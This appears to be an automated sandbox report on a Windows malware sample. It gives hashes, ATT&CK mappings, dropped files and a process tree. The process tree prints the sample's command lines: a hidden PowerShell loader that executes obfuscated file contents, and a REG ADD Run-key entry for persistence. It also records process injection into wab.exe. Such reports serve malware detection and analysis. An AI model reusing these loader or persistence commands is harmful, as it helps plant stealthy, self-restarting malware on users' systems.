4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545

General

Target

4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe
Size

990KB
MD5

54e257b56a256a2f1b062d2cebda6b2d
SHA1

4c4d8ddc6afce07f623b256fb21638cbdbd16144
SHA256

4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545
SHA512

6f8e30f1b11fee49461691fd1d74de2dfe1c6f64c369d59632cb9e862ba3c3d0abab329e3134f5adcc066ee26f00f96ce303e1f5cdc318969698a7ce99261fce
SSDEEP

24576:/4ezTAAfvu9z/4Jy7WjTfmzKnsWhegcKyJI:/4WAAfIgNjT+KnsWhegcXG

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2460	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dugens = "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\\Imbodying\\').Swails;%Spontan59% ($Taarepersede)"	reg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\driftschefernes.ini	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2460	powershell.exe
2404	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2460 set thread context of 2404	2460	powershell.exe	32

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\twig\Monetising.lnk	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe
File opened for modification	C:\Program Files (x86)\inspiredly.snu	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\undispersing\frelserens.ini	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2432	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2460	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1844 wrote to memory of 2460	1844	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe	28
PID 1844 wrote to memory of 2460	1844	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe	28
PID 1844 wrote to memory of 2460	1844	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe	28
PID 1844 wrote to memory of 2460	1844	4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe	28
PID 2460 wrote to memory of 2812	2460	powershell.exe	30
PID 2460 wrote to memory of 2812	2460	powershell.exe	30
PID 2460 wrote to memory of 2812	2460	powershell.exe	30
PID 2460 wrote to memory of 2812	2460	powershell.exe	30
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2460 wrote to memory of 2404	2460	powershell.exe	32
PID 2404 wrote to memory of 2380	2404	wab.exe	33
PID 2404 wrote to memory of 2380	2404	wab.exe	33
PID 2404 wrote to memory of 2380	2404	wab.exe	33
PID 2404 wrote to memory of 2380	2404	wab.exe	33
PID 2380 wrote to memory of 2432	2380	cmd.exe	35
PID 2380 wrote to memory of 2432	2380	cmd.exe	35
PID 2380 wrote to memory of 2432	2380	cmd.exe	35
PID 2380 wrote to memory of 2432	2380	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe
"C:\Users\Admin\AppData\Local\Temp\4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Nondenunciation=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.Non';$Tabinet=$Nondenunciation.SubString(50736,3);.$Tabinet($Nondenunciation)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2812
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2380
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.Non

Filesize
49KB

MD5
80157482bbee05d39cc6eb150df00ee5

SHA1
541958b59d496ae8814c09336eda330993db754c

SHA256
4c2726ecd1f509ea66be91622735c2b9885c232c3b3733390e46d2859b2aed0b

SHA512
82f62f244fe0690c68b4eb983e1bd5ae421a5f10cf12d281a9dc167d9b99f60ea4dcac573f05626e5fc41ae50d18754029eae3f677806a83dfd7a801bda61c16

Download Submit
C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Straalerne.Now

Filesize
299KB

MD5
74633979df571bd25e1c1e87f24becf7

SHA1
e2cb97f7015f6e49dde64f15f9c78607b32797e2

SHA256
a6bc8292d47989709e989e8f32243c7b42ca38879ec19ffec6376a69e2d0cf4f

SHA512
6dcae3ca303a709d3ad2e9c1ce90836ad84bdd49c5e0a78fc066c1e31493525a71f04b0a39e5593db953fe6f8c5e84b421a8c5a20814d01933c1bd41b1341f31

Download Submit
memory/2404-18-0x0000000000A50000-0x0000000001AB2000-memory.dmp

Filesize
16.4MB

Download
memory/2460-8-0x0000000074121000-0x0000000074122000-memory.dmp

Filesize
4KB

Download
memory/2460-12-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-11-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-10-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-9-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-16-0x00000000066F0000-0x000000000A647000-memory.dmp

Filesize
63.3MB

Download
memory/2460-17-0x0000000074120000-0x00000000746CB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads